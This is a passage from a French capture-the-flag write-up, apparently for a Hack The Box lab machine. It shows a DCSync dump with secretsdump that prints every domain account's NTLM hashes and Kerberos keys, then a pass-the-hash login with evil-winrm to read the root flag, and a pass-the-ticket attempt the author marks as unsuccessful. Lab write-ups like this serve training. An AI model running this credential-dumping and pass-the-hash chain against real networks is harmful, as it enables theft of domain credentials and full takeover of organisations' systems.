</span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">secretsdump.py -just-dc ethan:limpbizkit@10.10.11.42 -outputfile dcsync_hashes </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:1109:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: </span></span><span class="line"><span class="cl">DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Kerberos keys grabbed </span></span><span class="line"><span class="cl">Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 </span></span><span class="line"><span class="cl">Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 </span></span><span class="line"><span class="cl">Administrator:des-cbc-md5:403286f7cdf18385 </span></span><span class="line"><span class="cl">krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648 </span></span><span class="line"><span class="cl">krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94 </span></span><span class="line"><span class="cl">krbtgt:des-cbc-md5:2c0bc7d0250dbfc7 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:des-cbc-md5:bc2a4a7929c198e9 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:aes256-cts-hmac-sha1-96:de3afc157b17c25bf056296233cf23629c06aa2f19d414afbe0afe3da7d59835 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:aes128-cts-hmac-sha1-96:038498213933ca1f3d43b4d7f6b0a572 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:des-cbc-md5:07bf8f89c229c219 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:aes256-cts-hmac-sha1-96:c0e6eaa8e841c72e55ef6a938565403e27aa728f5397e75d8cae6cd3423957bd </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:aes128-cts-hmac-sha1-96:3e8b0ff2f07fd2178ec4d33f1ad0bc4b </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:des-cbc-md5:4a4aa4e3bc5eab61 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:des-cbc-md5:804343fb6e0dbc51 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:des-cbc-md5:58387aef9d6754fb </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:des-cbc-md5:49ba9dcb6d07d0bf </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:des-cbc-md5:3249fba89813ef5d </span></span><span class="line"><span class="cl">DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb </span></span><span class="line"><span class="cl">DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d </span></span><span class="line"><span class="cl">DC$:des-cbc-md5:f483547c4325492a </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span></code></pre></td></tr></table> </div> </div><h3 id="evil-winrm">Evil-winrm </h3><p>En utilisant le hash de l&rsquo;administrator on peut directement se connecter avec <code>evil-winrm</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ evil-winrm -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i 10.10.11.42 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 11/29/2024 10:54 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">8431.....8a6b </span></span></code></pre></td></tr></table> </div> </div><h3 id="pass-the-ticket-attack-ptt">Pass The Ticket Attack (PTT) </h3><p>PAS REUSSI, FINALEMENT PAS UTILE ?</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span>Administrator.ccache </span></span><span class="line"><span class="cl"><span class="c1">## On récupère un ticket</span> </span></span><span class="line"><span class="cl">getTGT.py ADMINISTRATOR.HTB/Administrator -aesKey 9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator.ccache </span></span></code></pre></td></tr></table> </div> </div>